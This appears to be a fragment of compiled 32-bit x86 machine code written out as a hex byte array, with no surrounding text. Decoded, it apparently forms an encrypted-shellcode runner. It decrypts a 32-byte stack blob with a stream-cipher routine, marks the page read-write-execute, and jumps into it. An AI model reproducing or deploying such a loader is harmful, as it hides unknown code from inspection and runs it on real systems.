0x00, 0x3c, 0xff, 0x75, 0x12, 0x8b, 0x55, 0x08, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x05, 0xb0, 0x00, 0x00, 0x00, 0xc6, 0x00, 0x00, 0xeb, 0x24, 0x8b, 0x55, 0x08, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x05, 0xb0, 0x00, 0x00, 0x00, 0x0f, 0xb6, 0x00, 0x8d, 0x50, 0x01, 0x8b, 0x4d, 0x08, 0x8b, 0x45, 0xf4, 0x01, 0xc8, 0x05, 0xb0, 0x00, 0x00, 0x00, 0x88, 0x10, 0xeb, 0x0a, 0x83, 0x6d, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x00, 0x79, 0xac, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x0c, 0x8b, 0x45, 0xf8, 0x01, 0xd0, 0x0f, 0xb6, 0x08, 0x8d, 0x55, 0xe4, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x5d, 0x0c, 0x8b, 0x45, 0xf8, 0x01, 0xd8, 0x31, 0xca, 0x88, 0x10, 0x83, 0x45, 0xf8, 0x01, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xf8, 0x3b, 0x45, 0x10, 0x0f, 0x82, 0x2d, 0xff, 0xff, 0xff, 0x90, 0x90, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x8b, 0x04, 0x24, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x81, 0xec, 0x24, 0x01, 0x00, 0x00, 0xe8, 0xe5, 0xea, 0xff, 0xff, 0x81, 0xc3, 0x35, 0x2a, 0x00, 0x00, 0xc7, 0x45, 0xd0, 0x58, 0x0c, 0x1f, 0xac, 0xc7, 0x45, 0xd4, 0xea, 0x0a, 0x4d, 0x54, 0xc7, 0x45, 0xd8, 0xe0, 0xab, 0x5f, 0x60, 0xc7, 0x45, 0xdc, 0xe4, 0xef, 0x99, 0xf2, 0xc7, 0x45, 0xe0, 0x33, 0x95, 0x65, 0x22, 0xc7, 0x45, 0xe4, 0xec, 0xff, 0x85, 0x5f, 0xc7, 0x45, 0xe8, 0xac, 0x1d, 0xcb, 0x4a, 0xc7, 0x45, 0xec, 0x2d, 0x4f, 0x71, 0x85, 0xc7, 0x45, 0xc0, 0x5b, 0x90, 0x32, 0x46, 0xc7, 0x45, 0xc4, 0x9b, 0x7f, 0x9a, 0x7b, 0xc7, 0x45, 0xc8, 0x2a, 0xf9, 0xdb, 0x0e, 0xc7, 0x45, 0xcc, 0xe8, 0x74, 0x01, 0x1c, 0xc7, 0x45, 0xa0, 0x1e, 0xe1, 0xda, 0x8c, 0xc7, 0x45, 0xa4, 0xee, 0xad, 0xdb, 0xf9, 0xc7, 0x45, 0xa8, 0x89, 0x19, 0xd5, 0x68, 0xc7, 0x45, 0xac, 0x7f, 0xf2, 0x15, 0xa5, 0xc7, 0x45, 0xb0, 0x41, 0x26, 0x8b, 0x76, 0xc7, 0x45, 0xb4, 0xdf, 0x74, 0x9a, 0x31, 0xc7, 0x45, 0xb8, 0x2f, 0x94, 0xdc, 0x29, 0xc7, 0x45, 0xbc, 0x1e, 0x90, 0x9f, 0x4b, 0x83, 0xec, 0x04, 0x8d, 0x45, 0xc0, 0x50, 0x8d, 0x45, 0xd0, 0x50, 0x8d, 0x85, 0xe0, 0xfe, 0xff, 0xff, 0x50, 0xe8, 0x9d, 0xed, 0xff, 0xff, 0x83, 0xc4, 0x10, 0x83, 0xec, 0x04, 0x6a, 0x20, 0x8d, 0x45, 0xa0, 0x50, 0x8d, 0x85, 0xe0, 0xfe, 0xff, 0xff, 0x50, 0xe8, 0xa5, 0xfd, 0xff, 0xff, 0x83, 0xc4, 0x10, 0x8d, 0x45, 0xa0, 0x25, 0x00, 0xf0, 0xff, 0xff, 0x83, 0xec, 0x04, 0x6a, 0x07, 0x68, 0x00, 0x10, 0x00, 0x00, 0x50, 0xe8, 0x89, 0xe9, 0xff, 0xff, 0x83, 0xc4, 0x10, 0x89, 0x45, 0xf4, 0x8d, 0x45, 0xa0, 0x89, 0x45, 0xf0, 0x8b, 0x45, 0xf0, 0xff, 0xd0, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xe4, 0xf0, 0xe8, 0xf0, 0xfe, 0xff, 0xff, 0x05, 0x38, 0x29, 0x00, 0x00, 0xe8, 0xea, 0xfe, 0xff, 0xff, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xc9, 0xc3, 0x66, 0x90, 0x66, 0x90, 0x66, 0x90, 0x90, 0x55, 0xe8, 0x5b, 0x00, 0x00, 0x00, 0x81, 0xc5, 0x1a, 0x29, 0x00, 0x00, 0x57, 0x56, 0x53, 0x83, 0xec, 0x0c, 0x89, 0xeb, 0x8b, 0x7c, 0x24, 0x28, 0xe8, 0x03, 0xe9, 0xff, 0xff, 0x8d, 0x9d, 0xf8, 0xfe, 0xff, 0xff, 0x8d, 0x85, 0xf4, 0xfe, 0xff, 0xff, 0x29, 0xc3, 0xc1, 0xfb, 0x02, 0x74, 0x25, 0x31, 0xf6, 0x8d, 0xb6, 0x00, 0x00, 0x00, 0x00, 0x83, 0xec, 0x04, 0x57, 0xff, 0x74, 0x24, 0x2c, 0xff, 0x74, 0x24, 0x2c, 0xff, 0x94, 0xb5, 0xf4, 0xfe, 0xff, 0xff, 0x83, 0xc6, 0x01, 0x83, 0xc4, 0x10, 0x39, 0xf3, 0x75, 0xe3, 0x83, 0xc4, 0x0c, 0x5b, 0x5e, 0x5f, 0x5d, 0xc3, 0x8d, 0x76, 0x00, 0xc3, 0x8b, 0x2c, 0x24, 0xc3, 0x53, 0x83, 0xec, 0x08, 0xe8, 0x5f, 0xe9, 0xff, 0xff, 0x81, 0xc3, 0xaf, 0x28, 0x00, 0x00, 0x83, 0xc4, 0x08, 0x5b, 0xc3
